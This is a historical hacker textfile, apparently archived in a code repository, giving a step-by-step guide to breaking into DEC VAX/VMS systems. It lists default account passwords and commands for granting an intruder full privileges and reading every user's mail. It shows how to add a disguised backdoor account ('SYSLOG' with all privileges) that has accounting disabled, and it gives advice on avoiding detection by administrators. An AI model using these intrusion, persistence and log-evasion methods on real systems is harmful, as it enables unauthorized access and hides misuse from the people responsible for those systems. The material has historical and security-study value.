informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/hacking/VMS/vax.txt

396 lines
14 KiB
Plaintext
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

Extract from COMPUTER FRAUD & SECURITY BULLETIN
This information was intended for the computer security industry to show
system managers what they are up against regarding HACKING.
HACKING VAX'S VMS.
INTRODUCTION.
The VAX is made by DEC(Digital Equipment Corp) and can run a variety of
operating systems
In this file,I will talk about the VMS(Virtual Memory Operating System),VMS
also runs on the PDP-11, both mainframes are 32 bit machines with 32 bit
virtual address space.
ENTRANCE:
When you first connect with a VAX you type either a return,a ctrl-c,or a
ctrl-y
It will then respond with something similar to:
LOD RECURSIVE SYSTEMS INC VMS V4.0
Username:
Password:
The most frequent way of gaining access to a computer is by using a
'default' login/password.
In this example you may try L as the user name and RECURSIVE as the
password or a combination of words in the opening banner (if there is
one) which may allow you access,otherwise you will have to try the
DEFAULT METHOD of entry.The version listed above
(V4.0)is the latest version to my knowledge of VMS.
The more widely used version that I have seen is V3.7.
When DEC sells a VAX/VMS,the system comes equipped with 4 accounts
which are:
DEFAULT This serves as a template in creating user records in the UAF
(User Authorization File).A new user record is assigned the values of
the DEFAULT record except where the system manager changes those values.
The DEFAULT record can be modified but cannot be deleted from the UAF.
SYSTEM Provides a means for the system manager to log in with full
priviliges.
The SYSTEM record can be modified but cannot be deleted from the UAF.
FIELD Permits DIGITAL field service personnel to check out a new
system.The FIELD record can be deleted once the system is installed.
SYSTEST Provides an appropriate environment for running the User
Environment Test Package (UETP).
The SYSTEST record can be deleted once the system is installed.
Usually the SYSTEM MANAGER adds,deletes,and modifies these records
which are in the UAF when the system arrives, thus, eliminating the
default passwords, but this is not true in all cases. The default
passwords that I have found to get me into a system are:
Username: Password:
SYSTEM MANAGER or OPERATOR
FIELD SERVICE
or TEST
DEFAULT USER or DEFAULT
SYSTEST UETP or SYSTEST
Other typical VMS accounts are:
VAX
VMS
DCL
DEMO
TEST
HELP
NEWS
GUEST
GAMES
DECNET
Or a combination of the various usernames and passwords. If none of
these get you in,then you should move on to the next system unless
you have a way to get usernames/passwords, like from trashing,
stealing passwords directly,or by some other means.
YOUR IN!
You will know that you are in by receiving the prompt of a dollar
sign '$'. You will be popped into the default directory which is
dependent on what account you are logged in as. If you get in as the
system manager, you have full access. If you get in on the field or
systest accounts, you may or may not have full access but you will
have the privileges to give yourself full access. To give privs to
yourself:
$ SET PROCESS/PRIVS=ALL
Once you have full privs, you can access any directory and any file,
and also run the AUTHORIZE pgm which will be explained.
The VMS system has full help files available by typing HELP.
You can use the wildcard character of an '*' to list out info on every
command:
$ HELP *
When you first logon, it may be to your advantage to get a list of all
users currently logged onto the system if there are any at all.
You can do this by:
$ SHOW USERS
VAX/VMS Interactive Users-Total=4
01-May-1985 11:37:21.73
OPA0: DEMO 004C004C
TTD2: LAWRENCL 0059004A
TXB1: FIELD 008D004E
TXB3: TWYLYSYS 01190057
It is highly recommended that if you are logged on in the day and there
are people logged in, especially the system manager or the account you
are logged on as, logout and call back later. I have found that no matter
what system you are on, the best way to remain undetected is to call
when no one is on the system.You do not want to call to late since the
system keeps a record of when each user logs in and out.
To communicate with other users or other hackers that you are on the
system with, use the PHONES Utility.
$ PHONES Username
If the system has DEC-net,you can see what available nodes there are by:
$ SHOW NETWORK
If you have mail the system will tell you so after logging in,
simply type:
$ MAIL
This will invoke the Personal Mail Utility, you can use help from there.
There are a lot of commands and many are not to usefull, (to the hacker
anyway), so I will not go into detail. One thing about VMS, there is
plenty of online help available which will enable you to learn the
operating system fairly well.
DIRECTORIES:
To see what you have in your directory type:
$ DIR
To get a list of directories on the system type:
$ DIR <*.*>
When a VAX/VMS is first installed, it comes with nine directories
which are not listed when you execute the DIR *.* command:
<SYSLIB>
This directory contains various macro and object libraries.
<SYSMSG>
This directory contains files used in managing the operating system.
<SYSMGR>
This directory contains text files and help libraries for the HELP utility.
<SYSERR>
This is the directory for the error log file (ERRLOG.SYS).
<SYSTEST>
This directory contains files used in testing the functions of the
operating system.
<SYSMAINT>
This directory contains system diagnostic programs.
<SYSUPD>
This directory contains files used in applying system updates.
<SYSUPD.EXAMPLES>
This directory contains sample driver programs, user-written system
services, and other source programs.
<SYSEXE>
This directory contains the executable images of most of the functions
of the operating system.
Inside these directories are files with the following file-types:
File-type! Description: ! Command:
--------------------------------------
.txt !Ascii text file !TYPE filename
.hlp !System help file !TYPE filename
.dat !Data file !TYPE filename
.msg !Message file !TYPE filename
.doc !Documentation !TYPE filename
.log !Log file !TYPE filename
.err !Error msg file !TYPE filename
.seq !Sequential file !TYPE filename
.sys !System file !FILE-NAME
.exe !Executable file !FILE-NAME
.com !Command file !COMMAND NAME
.bas !Basic file !RUN file-name
---------------------------------------
There are others but you won't see them as much as the above.
You can change directories either by using the CHANGE command or
by using the SET DEFAULT command:
$ CHANGE
<DIR.NAM>
or
$ SET DEFAULT <DIR.NAM>
You can now list and execute the files in this directory without
first typing the directory name followed by the file name as long
as you have sufficient access. If you don't have sufficient access
you can still view files within directories that you cannot
default to by:
$ TYPE <LOD.DIR>LOD.MAI;1
This will list the contents of the file LOD.MAI;1 in the directory
of <LOD.DIR>.
The use of wildcards is very helpfull when you desire to view all the
mail or something on a system. To list out all the users mail if you
have access type:
$ TYPE<*.*>*.MAI;*
As you may notice mail files have the extension of MAI at the end.
The ;1 or ;2 etc are used to number files with the same name.
PRIVILEGES
Privileges fall into seven categories according to the damage that
the user possessing them could cause the system:
None -No privileges
Normal-Minimum privileges to effectively use the system.
Group -Potential to interfere with members of the same group.
Devour-Potential to devour noncritical system-wide resources.
System-Potential to interfere with normal system operation.
File -Potential to compromise file security.
All -Potential to control the system (hehe).
THE UAF
The User Authorization File contains the names of users who may log
into the system and also contains a record of the user's privileges.
Each record in the UAF includes the following:
1. Name and Password
2. User Identification Code(UIC)--Identifies a user by a group number
and a member number.
3. Default file specification---Has the default device and directory
names for file access.
4. Login command file---Names a command procedure to be executed
automatically at login time.
5. Login flags---Allows the system manager to inhibit the user of
the CTRL-Y function, and lock user passwords.
6. Priority---Specifies the base priority of the process created by
the user at login time.
7. Resources---Limits the system resources the user may perform.
8. Privileges---Limits activities the user may perform.
If you have SYSTEM MANAGER privileges, you will be able to add, delete,
and modify records in the UAF.
The AUTHORIZE Utility allows you to modify the information in the UAF.
It is usually found in the SYSEXE directory.
The commands for AUTHORIZE are:
ADD username <qualifier..> Adds a record to the UAF.
EXIT (or CTRL-Z) Returns you to command level.
HELP Lists the AUTHORIZE commands.
LIST <userspec></FULL> Creates a listing file of UAF records.
MODIFY username Modifies a record.
REMOVE username Deletes a record.
SHOW Displays UAF records.
The most usefull besides ADD is the SHOW command.
SHOW displays reports for selected UAF records. You can get a /BRIEF
listing of a /FULL listing.
But before you do that, you may want to make sure no one is logged
on besides you. And to make sure no one can log on, you do this by:
$ SET LOGINS /INTERACTIVE=0
This establishes the maximum number of users able to log in to the
system, this command does not affect users currently logged on. I
never do the above since it is not really needed and looks very
suspicious. Now,to list out the userfile do the following:
$ SET DEFAULT <SYSEXE>
$ RUN AUTHORIZE
UAF>SHOW * /BRIEF
To get a full report:
(if you used the SET DEFAULT cmd earlier and the default dir is the <SYSEXE>
directory,then you don't have to re-type it).
$ RUN AUTHORIZE (or if you still have the UAF prompt):
UAF>SHOW * /FULL
Username:SYSTEM Owner:SYSTEM MANAGER
Account: SYSTEM UIC: <001,004>
CLI: DCL LGICMD:
Default Device: SYS$ROOT:
Default Directory: <SYSMGR>
Login Flags:
Primary days:Mon Tue Wed Thu Fri
Secondary days: Sat Sun
No hourly restrictions
PRIO:4 BYTLM:20480 BIOLM: 12
PRCLM:10 PBYTLYM:0 DIOLM: 12
ASTLM:20 WSDEFAULT:150 FILLM: 20
ENQLM:20 WSQUOTA:350 SHRFILLM: 0
TQELM:20 WSECTENT:1024 CPU:no limit
MAXJOBS:0 MAXACCTJOBS:0 PGFLQUOTA:2000000
Privileges:
CMKRNL CMEXEC SYSNAM GRPNAM ALLSPOOL DETACH DIAGNOSE LOG-10
GROUP ACNT PRMCEB PRMMBX PSWAPM ALTPRI SETPRV TMPMBX WORLD
OPER EXQU OTA NETMBX VOLPRO PHY-10 BUGCHK PRMGBL SYSGBL
PFNMAP SHMEM SYSPRV SYSCLK
UAF
Unfortunately, you cannot get a listing of passwords, though you
can get the list of users as shown above. The passwords are encrypted
just like a UNIX system,but you cannot even see the encrypted password
unless you look at the actual file that the UAF draws it's information
from.
After listing out all the users, you figure that since these other people
are on here, why can't I have my own account? Well,if you have sufficient
privs,you can!
UAF ADD SYSLOG /PASSWORD=LEGION /UIC=<014,006> /CPUTIME=0 (...no CR)
/DEVICE=SYS$SYSROOT_/ACCOUNT=VMS /DIRECTORY=<SYSERR> /PRIVS=ALL (...no CR)
/OWNER=DIGITAL /NOACCOUNTING
1)You ADD the username SYSLOG (you do not want to create a user like Lex,
since it will be too obvious and not look right).
I have had much success in not being detected with this acct.
2)You specify the password for the SYSLOG account.
3)You assign a UIC (User Ident Code) which consists of two numbers
in the range of 0 through 377,seperated by a comma and enclosed in brackets.
The system assigns a UIC to a detached process created for the user
at login time. User processes pass on this UIC to any subprocesses they
create. Processes can further assign UICs to files, mailboxes, devices, etc.
You can assign the same UIC to more than 1 user.
4)CPUTIME is in delta format, 0 means INFINITE, which is what we will use.
5)You specify the DEVICE that is allocated to the user when they login,
which for our purposes,is the SYS$SYSROOT device, other devices
are: SYS$DEVICE,SYS$SYSDISK,DB1,etc.
6)Specifying an account is not necessary, but if you do, use one that is
listed as another user's, since you don't want to attract too much
attention to the account.
7)The default directory can be a directory currently on the system or it
can be created after the UAF record is added. You may want to use one
of the ones mentioned earlier in the file, but be sure not to use the
<SYSMGR> directory.
8)You can select one of the privileges listed earlier in this file,
we will use, of course, ALL.
9)OWNER is similar to the ACCOUNT qualifier, again, look at what the other
users have listed.
10)NO ACCOUNTING will disable system accounting records, thus not adding
information to the ACCOUNTING.DAT file.
After the UAF record is successfully added, you should create a directory
by specifying the device name, directory name, and UIC of the UAF record.
Protection for the 'ordinary' user is normally, Read, Write, Execute, and
Delete access for the system, owner, and group processes, and read and
execute access for word processors. To create a directory:
$ CREATE SYS$SYSROOT:<SYSLOG> /DIRECTORY /OWNER-UIC=<014,006>
LOGGING OFF:
Simply type:
$LOGOUT
The system will display the usual CPU time used and other statistics.
HAVE LOTS OF FUN,CAUSE NO DAMAGE.
---------------------------------
Reference in New Issue View Git Blame Copy Permalink